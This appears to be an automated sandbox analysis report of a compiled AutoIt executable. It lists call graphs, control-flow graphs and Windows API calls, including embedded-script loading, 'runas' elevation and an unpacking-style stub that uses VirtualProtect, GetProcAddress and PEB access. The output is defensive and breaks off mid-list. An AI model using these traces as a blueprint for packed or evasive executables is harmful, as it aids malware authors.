dd77c7 59 API calls 100436->100439 100438 e0d44b 100437->100438 100440 dd81a7 59 API calls 100438->100440 100441 dd387f 100439->100441 100442 e0d459 100440->100442 100550 dd3ee2 100441->100550 100444 dd3ee2 59 API calls 100442->100444 100446 e0d468 100444->100446 100452 dd81a7 59 API calls 100446->100452 100448 dd3899 100448->100422 100449 dd38a3 100448->100449 100450 df313d _W_store_winword 60 API calls 100449->100450 100451 dd38ae 100450->100451 100451->100428 100453 dd38b8 100451->100453 100454 e0d48a 100452->100454 100455 df313d _W_store_winword 60 API calls 100453->100455 100456 dd3ee2 59 API calls 100454->100456 100457 dd38c3 100455->100457 100458 e0d497 100456->100458 100457->100432 100459 dd38cd 100457->100459 100458->100458 100460 df313d _W_store_winword 60 API calls 100459->100460 100461 dd38d8 100460->100461 100461->100446 100462 dd3919 100461->100462 100464 dd3ee2 59 API calls 100461->100464 100462->100446 100463 dd3926 100462->100463 100466 dd942e 59 API calls 100463->100466 100465 dd38fc 100464->100465 100467 dd81a7 59 API calls 100465->100467 100468 dd3936 100466->100468 100469 dd390a 100467->100469 100470 dd91b0 59 API calls 100468->100470 100471 dd3ee2 59 API calls 100469->100471 100472 dd3944 100470->100472 100471->100462 100566 dd9040 100472->100566 100474 dd93ea 59 API calls 100476 dd3961 100474->100476 100475 dd9040 60 API calls 100475->100476 100476->100474 100476->100475 100477 dd3ee2 59 API calls 100476->100477 100478 dd39a7 Mailbox 100476->100478 100477->100476 100478->100348 100480 dd73f2 __ftell_nolock 100479->100480 100481 dd740b 100480->100481 100482 e0ee4b _memset 100480->100482 100483 dd48ae 60 API calls 100481->100483 100485 e0ee67 7516D0D0 100482->100485 100484 dd7414 100483->100484 100615 df09d5 100484->100615 100487 e0eeb6 100485->100487 100488 dd7d2c 59 API calls 100487->100488 100490 e0eecb 100488->100490 100490->100490 100492 dd7429 100633 dd69ca 100492->100633 100496 de0a9a __ftell_nolock 100495->100496 100811 dd6ee0 100496->100811 100498 de0a9f 100499 dd3c26 100498->100499 100822 de12fe 89 API calls 100498->100822 100499->100361 100499->100366 100501 de0aac 100501->100499 100531->100361 100534 dd3d50 __ftell_nolock 100533->100534 100535 dd7d2c 59 API calls 100534->100535 100540 dd3eb6 Mailbox 100534->100540 100537 dd3d82 100535->100537 100536 dd7b52 59 API calls 100536->100537 100537->100536 100545 dd3db8 Mailbox 100537->100545 100538 dd7b52 59 API calls 100538->100545 100539 dd3e89 100539->100540 100541 dd7f41 59 API calls 100539->100541 100540->100402 100543 dd3eaa 100541->100543 100542 dd7f41 59 API calls 100542->100545 100544 dd3f84 59 API calls 100543->100544 100544->100540 100545->100538 100545->100539 100545->100540 100545->100542 100546 dd3f84 59 API calls 100545->100546 100546->100545 100548 df0ff6 Mailbox 59 API calls 100547->100548 100549 dd380d 100548->100549 100549->100423 100551 dd3eec 100550->100551 100552 dd3f05 100550->100552 100554 dd81a7 59 API calls 100551->100554 100553 dd7d2c 59 API calls 100552->100553 100555 dd388b 100553->100555 100554->100555 100556 df313d 100555->100556 100557 df31be 100556->100557 100558 df3149 100556->100558 100612 df31d0 60 API calls 3 library calls 100557->100612 100565 df316e 100558->100565 100610 df8d68 58 API calls __getptd_noexit 100558->100610 100561 df31cb 100561->100448 100562 df3155 100611 df8ff6 9 API calls __cftof_l 100562->100611 100564 df3160 100564->100448 100565->100448 100567 e0f5a5 100566->100567 100572 dd9057 100566->100572 100567->100572 100614 dd8d3b 59 API calls Mailbox 100567->100614 100569 dd9158 100573 df0ff6 Mailbox 59 API calls 100569->100573 100570 dd91a0 100613 dd9e9c 60 API calls Mailbox 100570->100613 100572->100569 100572->100570 100574 dd915f 100572->100574 100573->100574 100574->100476 100576 dd5045 85 API calls 100575->100576 100577 e39854 100576->100577 100578 e399be 96 API calls 100577->100578 100579 e39866 100578->100579 100580 dd506b 74 API calls 100579->100580 100608 e0d3c1 100579->100608 100581 e39881 100580->100581 100582 dd506b 74 API calls 100581->100582 100583 e39891 100582->100583 100584 dd506b 74 API calls 100583->100584 100585 e398ac 100584->100585 100586 dd506b 74 API calls 100585->100586 100587 e398c7 100586->100587 100588 dd5045 85 API calls 100587->100588 100589 e398de 100588->100589 100590 df594c __crtLCMapStringA_stat 58 API calls 100589->100590 100591 e398e5 100590->100591 100592 df594c __crtLCMapStringA_stat 58 API calls 100591->100592 100593 e398ef 100592->100593 100594 dd506b 74 API calls 100593->100594 100595 e39903 100594->100595 100596 e39393 GetSystemTimeAsFileTime 100595->100596 100597 e39916 100596->100597 100598 e39940 100597->100598 100599 e3992b 100597->100599 100600 e39946 100598->100600 100601 e399a5 100598->100601 100602 df2f95 _free 58 API calls 100599->100602 100603 e38d90 116 API calls 100600->100603 100604 df2f95 _free 58 API calls 100601->100604 100605 e39931 100602->100605 100607 e3999d 100603->100607 100604->100608 100606 df2f95 _free 58 API calls 100605->100606 100606->100608 100609 df2f95 _free 58 API calls 100607->100609 100608->100414 100608->100417 100609->100608 100610->100562 100611->100564 100612->100561 100613->100574 100614->100572 100616 e01b90 __ftell_nolock 100615->100616 100617 df09e2 GetLongPathNameW 100616->100617 100618 dd7d2c 59 API calls 100617->100618 100619 dd741d 100618->100619 100620 dd716b 100619->100620 100621 dd77c7 59 API calls 100620->100621 100622 dd717d 100621->100622 100623 dd48ae 60 API calls 100622->100623 100624 dd7188 100623->100624 100625 e0ecae 100624->100625 100626 dd7193 100624->100626 100632 e0ecc8 100625->100632 100673 dd7a68 61 API calls 100625->100673 100627 dd3f84 59 API calls 100626->100627 100629 dd719f 100627->100629 100667 dd34c2 100629->100667 100631 dd71b2 Mailbox 100631->100492 100634 dd4f3d 136 API calls 100633->100634 100635 dd69ef 100634->100635 100636 e0e45a 100635->100636 100637 dd4f3d 136 API calls 100635->100637 100638 e397e5 122 API calls 100636->100638 100639 dd6a03 100637->100639 100640 e0e46f 100638->100640 100639->100636 100643 dd6a0b 100639->100643 100641 e0e490 100640->100641 100642 e0e473 100640->100642 100645 df0ff6 Mailbox 59 API calls 100641->100645 100644 dd4faa 84 API calls 100642->100644 100646 dd6a17 100643->100646 100647 e0e47b 100643->100647 100644->100647 100656 e0e4d5 Mailbox 100645->100656 100674 dd6bec 100646->100674 100773 e34534 90 API calls _wprintf 100647->100773 100650 e0e489 100650->100641 100652 e0e689 100653 df2f95 _free 58 API calls 100652->100653 100654 e0e691 100653->100654 100655 dd4faa 84 API calls 100654->100655 100660 e0e69a 100655->100660 100656->100652 100657 dd766f 59 API calls 100656->100657 100656->100660 100664 dd7f41 59 API calls 100656->100664 100767 dd74bd 100656->100767 100774 e2fc4d 59 API calls 2 library calls 100656->100774 100775 e2fb6e 61 API calls 2 library calls 100656->100775 100776 e37621 59 API calls Mailbox 100656->100776 100657->100656 100661 df2f95 _free 58 API calls 100660->100661 100663 dd4faa 84 API calls 100660->100663 100777 e2fcb1 89 API calls 4 library calls 100660->100777 100661->100660 100663->100660 100664->100656 100668 dd34d4 100667->100668 100672 dd34f3 _memmove 100667->100672 100670 df0ff6 Mailbox 59 API calls 100668->100670 100669 df0ff6 Mailbox 59 API calls 100671 dd350a 100669->100671 100670->100672 100671->100631 100672->100669 100673->100625 100675 e0e847 100674->100675 100676 dd6c15 100674->100676 100799 e2fcb1 89 API calls 4 library calls 100675->100799 100783 dd5906 60 API calls Mailbox 100676->100783 100679 dd6c37 100784 dd5956 67 API calls 100679->100784 100680 e0e85a 100800 e2fcb1 89 API calls 4 library calls 100680->100800 100682 dd6c4c 100682->100680 100683 dd6c54 100682->100683 100685 dd77c7 59 API calls 100683->100685 100687 dd6c60 100685->100687 100686 e0e876 100689 dd6cc1 100686->100689 100785 df0b9b 60 API calls __ftell_nolock 100687->100785 100690 dd6ccf 100689->100690 100691 e0e889 100689->100691 100694 dd77c7 59 API calls 100690->100694 100693 dd5dcf CloseHandle 100691->100693 100692 dd6c6c 100695 dd77c7 59 API calls 100692->100695 100696 e0e895 100693->100696 100697 dd6cd8 100694->100697 100698 dd6c78 100695->100698 100699 dd4f3d 136 API calls 100696->100699 100700 dd77c7 59 API calls 100697->100700 100701 dd48ae 60 API calls 100698->100701 100702 e0e8b1 100699->100702 100703 dd6ce1 100700->100703 100704 dd6c86 100701->100704 100705 e0e8da 100702->100705 100709 e397e5 122 API calls 100702->100709 100706 dd46f9 59 API calls 100703->100706 100786 dd59b0 ReadFile SetFilePointerEx 100704->100786 100801 e2fcb1 89 API calls 4 library calls 100705->100801 100710 dd6cf8 100706->100710 100708 dd6cb2 100787 dd5c4e SetFilePointerEx SetFilePointerEx 100708->100787 100713 e0e8cd 100709->100713 100714 dd7c8e 59 API calls 100710->100714 100716 e0e8d5 100713->100716 100717 e0e8f6 100713->100717 100718 dd6d09 SetCurrentDirectoryW 100714->100718 100715 e0e8f1 100744 dd6e6c Mailbox 100715->100744 100719 dd4faa 84 API calls 100716->100719 100720 dd4faa 84 API calls 100717->100720 100723 dd6d1c Mailbox 100718->100723 100719->100705 100721 e0e8fb 100720->100721 100722 df0ff6 Mailbox 59 API calls 100721->100722 100729 e0e92f 100722->100729 100724 df0ff6 Mailbox 59 API calls 100723->100724 100727 dd6d2f 100724->100727 100726 dd3bcd 100726->100351 100726->100359 100728 dd538e 59 API calls 100727->100728 100756 dd6d3a Mailbox __wsetenvp 100728->100756 100730 dd766f 59 API calls 100729->100730 100762 e0e978 Mailbox 100730->100762 100731 dd6e47 100795 dd5dcf 100731->100795 100734 e0eb69 100806 e37581 59 API calls Mailbox 100734->100806 100735 dd6e53 SetCurrentDirectoryW 100735->100744 100738 e0eb8b 100807 e3f835 59 API calls 2 library calls 100738->100807 100741 e0eb98 100743 df2f95 _free 58 API calls 100741->100743 100742 e0ec02 100810 e2fcb1 89 API calls 4 library calls 100742->100810 100743->100744 100778 dd5934 100744->100778 100747 e0ec1b 100747->100731 100748 dd766f 59 API calls 100748->100762 100750 e0ebfa 100809 e2fb07 59 API calls 4 library calls 100750->100809 100752 dd7f41 59 API calls 100752->100756 100756->100731 100756->100742 100756->100750 100756->100752 100788 dd59cd 67 API calls _wcscpy 100756->100788 100789 dd70bd GetStringTypeW 100756->100789 100790 dd702c 60 API calls __wcsnicmp 100756->100790 100791 dd710a GetStringTypeW __wsetenvp 100756->100791 100792 df387d GetStringTypeW _iswctype 100756->100792 100793 dd6a3c 165 API calls 3 library calls 100756->100793 100794 dd7373 59 API calls Mailbox 100756->100794 100757 dd7f41 59 API calls 100757->100762 100761 e0ebbb 100808 e2fcb1 89 API calls 4 library calls 100761->100808 100762->100734 100762->100748 100762->100757 100762->100761 100802 e2fc4d 59 API calls 2 library calls 100762->100802 100803 e2fb6e 61 API calls 2 library calls 100762->100803 100804 e37621 59 API calls Mailbox 100762->100804 100805 dd7373 59 API calls Mailbox 100762->100805 100764 e0ebd4 100765 df2f95 _free 58 API calls 100764->100765 100766 e0ebe7 100765->100766 100766->100744 100768 dd74d0 100767->100768 100771 dd757e 100767->100771 100769 df0ff6 Mailbox 59 API calls 100768->100769 100772 dd7502 100768->100772 100769->100772 100770 df0ff6 59 API calls Mailbox 100770->100772 100771->100656 100772->100770 100772->100771 100773->100650 100774->100656 100775->100656 100776->100656 100777->100660 100779 dd5dcf CloseHandle 100778->100779 100780 dd593c Mailbox 100779->100780 100781 dd5dcf CloseHandle 100780->100781 100782 dd594b 100781->100782 100782->100726 100783->100679 100784->100682 100785->100692 100786->100708 100787->100689 100788->100756 100789->100756 100790->100756 100791->100756 100792->100756 100793->100756 100794->100756 100796 dd5dd9 100795->100796 100797 dd5de8 100795->100797 100796->100735 100797->100796 100798 dd5ded CloseHandle 100797->100798 100798->100796 100799->100680 100800->100686 100801->100715 100802->100762 100803->100762 100804->100762 100805->100762 100806->100738 100807->100741 100808->100764 100809->100742 100810->100747 100812 dd7009 100811->100812 100813 dd6ef5 100811->100813 100812->100498 100813->100812 100814 df0ff6 Mailbox 59 API calls 100813->100814 100816 dd6f1c 100814->100816 100815 df0ff6 Mailbox 59 API calls 100816->100815 100822->100501 100857 1155058 100871 1152c68 100857->100871 100859 1155161 100874 1154f48 100859->100874 100877 11561a8 GetPEB 100871->100877 100873 11532f3 100873->100859 100875 1154f51 Sleep 100874->100875 100876 1154f5f 100875->100876 100878 11561d2 100877->100878 100878->100873 100879 ee8070 100880 ee8080 100879->100880 100881 ee819a LoadLibraryA 100880->100881 100885 ee81df VirtualProtect VirtualProtect 100880->100885 100882 ee81b1 100881->100882 100882->100880 100884 ee81c3 GetProcAddress 100882->100884 100884->100882 100887 ee81d9 ExitProcess 100884->100887 100886 ee8244 100885->100886 100886->100886 100888 dd3633 100889 dd366a 100888->100889 100890 dd3688 100889->100890 100891 dd36e7 100889->100891 100928 dd36e5 100889->100928 100895 dd375d PostQuitMessage 100890->100895 100896 dd3695 100890->100896 100893 dd36ed 100891->100893 100894 e0d31c 100891->100894 100892 dd36ca NtdllDefWindowProc_W 100930 dd36d8 100892->100930 100897 dd3715 SetTimer RegisterClipboardFormatW 100893->100897 100898 dd36f2 100893->100898 100938 de11d0 10 API calls Mailbox 100894->100938 100895->100930 100899 dd36a0 100896->100899 100900 e0d38f 100896->100900 100905 dd373e CreatePopupMenu 100897->100905 100897->100930 100903 dd36f9 KillTimer 100898->100903 100904 e0d2bf 100898->100904 100906 dd36a8 100899->100906 100907 dd3767 100899->100907 100942 e32a16 71 API calls _memset 100900->100942 100902 e0d343 100939 de11f3 331 API calls Mailbox 100902->100939 100933 dd44cb Shell_NotifyIconW _memset 100903->100933 100912 e0d2c4 100904->100912 100913 e0d2f8 MoveWindow 100904->100913 100905->100930 100915 e0d374 100906->100915 100916 dd36b3 100906->100916 100936 dd4531 64 API calls _memset 100907->100936 100909 e0d3a1 100909->100892 100909->100930 100918 e0d2e7 SetFocus 100912->100918 100919 e0d2c8 100912->100919 100913->100930 100915->100892 100941 e2817e 59 API calls Mailbox 100915->100941 100917 dd374b 100916->100917 100926 dd36be 100916->100926 100935 dd45df 81 API calls _memset 100917->100935 100918->100930 100922 e0d2d1 100919->100922 100919->100926 100920 dd370c 100934 dd3114 DeleteObject DestroyWindow Mailbox 100920->100934 100937 de11d0 10 API calls Mailbox 100922->100937 100925 dd375b 100925->100930 100926->100892 100940 dd44cb Shell_NotifyIconW _memset 100926->100940 100928->100892 100931 e0d368 100932 dd43db 68 API calls 100931->100932 100932->100928 100933->100920 100934->100930 100935->100925 100936->100925 100937->100930 100938->100902 100939->100926 100940->100931 100941->100928 100942->100909

                                          Executed Functions

                                          Function 00DD3B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DD3B7A
                                          • IsDebuggerPresent.KERNEL32 ref: 00DD3B8C
                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00E962F8,00E962E0,?,?), ref: 00DD3BFD
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                            • Part of subcall function 00DE0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DD3C26,00E962F8,?,?,?), ref: 00DE0ACE
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DD3C81
                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00E893F0,00000010), ref: 00E0D4BC
                                          • SetCurrentDirectoryW.KERNEL32(?,00E962F8,?,?,?), ref: 00E0D4F4
                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E85D40,00E962F8,?,?,?), ref: 00E0D57A
                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E0D581
                                            • Part of subcall function 00DD3A58: GetSysColorBrush.USER32(0000000F), ref: 00DD3A62
                                            • Part of subcall function 00DD3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00DD3A71
                                            • Part of subcall function 00DD3A58: LoadIconW.USER32(00000063), ref: 00DD3A88
                                            • Part of subcall function 00DD3A58: LoadIconW.USER32(000000A4), ref: 00DD3A9A
                                            • Part of subcall function 00DD3A58: LoadIconW.USER32(000000A2), ref: 00DD3AAC
                                            • Part of subcall function 00DD3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DD3AD2
                                            • Part of subcall function 00DD3A58: RegisterClassExW.USER32(?), ref: 00DD3B28
                                            • Part of subcall function 00DD39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DD3A15
                                            • Part of subcall function 00DD39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DD3A36
                                            • Part of subcall function 00DD39E7: ShowWindow.USER32(00000000,?,?), ref: 00DD3A4A
                                            • Part of subcall function 00DD39E7: ShowWindow.USER32(00000000,?,?), ref: 00DD3A53
                                            • Part of subcall function 00DD43DB: _memset.LIBCMT ref: 00DD4401
                                            • Part of subcall function 00DD43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DD44A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                          • String ID: This is a third-party compiled AutoIt script.$runas$%
                                          • API String ID: 529118366-3343222573
                                          • Opcode ID: 002d8b3b179638beb998daf1d371a007d249ae8b74e495d18f8f3ec72a53c755
                                          • Instruction ID: 89147ae250293db9e15472998b3fc262c07d2566b4ff31dc4c3d351fa68dfc6c
                                          • Opcode Fuzzy Hash: 002d8b3b179638beb998daf1d371a007d249ae8b74e495d18f8f3ec72a53c755
                                          • Instruction Fuzzy Hash: 9D51E470A18349AECF15ABF5DC06AFD7B78EB44340F0450A7F455B62A2DA709A49CB31
                                          Function 00DD3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151timewindowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 758 dd3633-dd3681 760 dd36e1-dd36e3 758->760 761 dd3683-dd3686 758->761 760->761 762 dd36e5 760->762 763 dd3688-dd368f 761->763 764 dd36e7 761->764 765 dd36ca-dd36d2 NtdllDefWindowProc_W 762->765 768 dd375d-dd3765 PostQuitMessage 763->768 769 dd3695-dd369a 763->769 766 dd36ed-dd36f0 764->766 767 e0d31c-e0d34a call de11d0 call de11f3 764->767 770 dd36d8-dd36de 765->770 772 dd3715-dd373c SetTimer RegisterClipboardFormatW 766->772 773 dd36f2-dd36f3 766->773 802 e0d34f-e0d356 767->802 771 dd3711-dd3713 768->771 774 dd36a0-dd36a2 769->774 775 e0d38f-e0d3a3 call e32a16 769->775 771->770 772->771 780 dd373e-dd3749 CreatePopupMenu 772->780 778 dd36f9-dd370c KillTimer call dd44cb call dd3114 773->778 779 e0d2bf-e0d2c2 773->779 781 dd36a8-dd36ad 774->781 782 dd3767-dd3776 call dd4531 774->782 775->771 794 e0d3a9 775->794 778->771 787 e0d2c4-e0d2c6 779->787 788 e0d2f8-e0d317 MoveWindow 779->788 780->771 790 e0d374-e0d37b 781->790 791 dd36b3-dd36b8 781->791 782->771 797 e0d2e7-e0d2f3 SetFocus 787->797 798 e0d2c8-e0d2cb 787->798 788->771 790->765 800 e0d381-e0d38a call e2817e 790->800 792 dd36be-dd36c4 791->792 793 dd374b-dd375b call dd45df 791->793 792->765 792->802 793->771 794->765 797->771 798->792 803 e0d2d1-e0d2e2 call de11d0 798->803 800->765 802->765 807 e0d35c-e0d36f call dd44cb call dd43db 802->807 803->771 807->765
                                          APIs
                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00DD36D2
                                          • KillTimer.USER32(?,00000001), ref: 00DD36FC
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DD371F
                                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DD372A
                                          • CreatePopupMenu.USER32 ref: 00DD373E
                                          • PostQuitMessage.USER32(00000000), ref: 00DD375F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                          • String ID: TaskbarCreated$%
                                          • API String ID: 157504867-3835587964
                                          • Opcode ID: 073713f8bfbb1970cf27dd3db1cae5283948da01879d2b56a820b7e23c7139fa
                                          • Instruction ID: 4efb7fe43e7a10464068840c397b37666a443cb99136859a6ee7f4f59ed3b9ab
                                          • Opcode Fuzzy Hash: 073713f8bfbb1970cf27dd3db1cae5283948da01879d2b56a820b7e23c7139fa
                                          • Instruction Fuzzy Hash: C94125B1214605BFDF286B69EC09B793B58EB44300F08152BF542B63E1CA64EE589773
                                          Function 00DD4AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 949 dd4afe-dd4b5e call dd77c7 GetVersionExW call dd7d2c 954 dd4c69-dd4c6b 949->954 955 dd4b64 949->955 956 e0db90-e0db9c 954->956 957 dd4b67-dd4b6c 955->957 958 e0db9d-e0dba1 956->958 959 dd4c70-dd4c71 957->959 960 dd4b72 957->960 962 e0dba3 958->962 963 e0dba4-e0dbb0 958->963 961 dd4b73-dd4baa call dd7e8c call dd7886 959->961 960->961 971 e0dc8d-e0dc90 961->971 972 dd4bb0-dd4bb1 961->972 962->963 963->958 965 e0dbb2-e0dbb7 963->965 965->957 967 e0dbbd-e0dbc4 965->967 967->956 969 e0dbc6 967->969 973 e0dbcb-e0dbce 969->973 974 e0dc92 971->974 975 e0dca9-e0dcad 971->975 972->973 976 dd4bb7-dd4bc2 972->976 977 e0dbd4-e0dbf2 973->977 978 dd4bf1-dd4c08 GetCurrentProcess IsWow64Process 973->978 979 e0dc95 974->979 983 e0dc98-e0dca1 975->983 984 e0dcaf-e0dcb8 975->984 980 e0dc13-e0dc19 976->980 981 dd4bc8-dd4bca 976->981 977->978 982 e0dbf8-e0dbfe 977->982 985 dd4c0d-dd4c1e 978->985 986 dd4c0a 978->986 979->983 991 e0dc23-e0dc29 980->991 992 e0dc1b-e0dc1e 980->992 987 dd4bd0-dd4bd3 981->987 988 e0dc2e-e0dc3a 981->988 989 e0dc00-e0dc03 982->989 990 e0dc08-e0dc0e 982->990 983->975 984->979 993 e0dcba-e0dcbd 984->993 994 dd4c89-dd4c93 GetSystemInfo 985->994 995 dd4c20-dd4c30 call dd4c95 985->995 986->985 996 dd4bd9-dd4be8 987->996 997 e0dc5a-e0dc5d 987->997 999 e0dc44-e0dc4a 988->999 1000 e0dc3c-e0dc3f 988->1000 989->978 990->978 991->978 992->978 993->983 998 dd4c56-dd4c66 994->998 1006 dd4c7d-dd4c87 GetSystemInfo 995->1006 1007 dd4c32-dd4c3f call dd4c95 995->1007 1002 dd4bee 996->1002 1003 e0dc4f-e0dc55 996->1003 997->978 1005 e0dc63-e0dc78 997->1005 999->978 1000->978 1002->978 1003->978 1008 e0dc82-e0dc88 1005->1008 1009 e0dc7a-e0dc7d 1005->1009 1010 dd4c47-dd4c4b 1006->1010 1014 dd4c76-dd4c7b 1007->1014 1015 dd4c41-dd4c45 GetNativeSystemInfo 1007->1015 1008->978 1009->978 1010->998 1013 dd4c4d-dd4c50 FreeLibrary 1010->1013 1013->998 1014->1015 1015->1010
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 00DD4B2B
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          • GetCurrentProcess.KERNEL32(?,00E5FAEC,00000000,00000000,?), ref: 00DD4BF8
                                          • IsWow64Process.KERNEL32(00000000), ref: 00DD4BFF
                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00DD4C45
                                          • FreeLibrary.KERNEL32(00000000), ref: 00DD4C50
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00DD4C81
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00DD4C8D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                          • String ID:
                                          • API String ID: 1986165174-0
                                          • Opcode ID: 3051ba537070555c34b52b4f690634e925aea016e90df4b17041072cb05e7a45
                                          • Instruction ID: e1219dca5d2e442751e77b759c8ebcfc6d90b65ea92e233973feb4d766f8cec4
                                          • Opcode Fuzzy Hash: 3051ba537070555c34b52b4f690634e925aea016e90df4b17041072cb05e7a45
                                          • Instruction Fuzzy Hash: 8491813154ABC0DEC731DB6885915AAFFE4AF36300B485D9FE0CA93B41D231E948D769
                                          Function 00DD4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1065 dd4fe9-dd5001 CreateStreamOnHGlobal 1066 dd5021-dd5026 1065->1066 1067 dd5003-dd501a FindResourceExW 1065->1067 1068 e0dd5c-e0dd6b LoadResource 1067->1068 1069 dd5020 1067->1069 1068->1069 1070 e0dd71-e0dd7f SizeofResource 1068->1070 1069->1066 1070->1069 1071 e0dd85-e0dd90 LockResource 1070->1071 1071->1069 1072 e0dd96-e0dd9e 1071->1072 1073 e0dda2-e0ddb4 1072->1073 1073->1069
                                          APIs
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DD4FF9
                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DD4EEE,?,?,00000000,00000000), ref: 00DD5010
                                          • LoadResource.KERNEL32(?,00000000,?,?,00DD4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DD4F8F), ref: 00E0DD60
                                          • SizeofResource.KERNEL32(?,00000000,?,?,00DD4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DD4F8F), ref: 00E0DD75
                                          • LockResource.KERNEL32(00DD4EEE,?,?,00DD4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DD4F8F,00000000), ref: 00E0DD88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
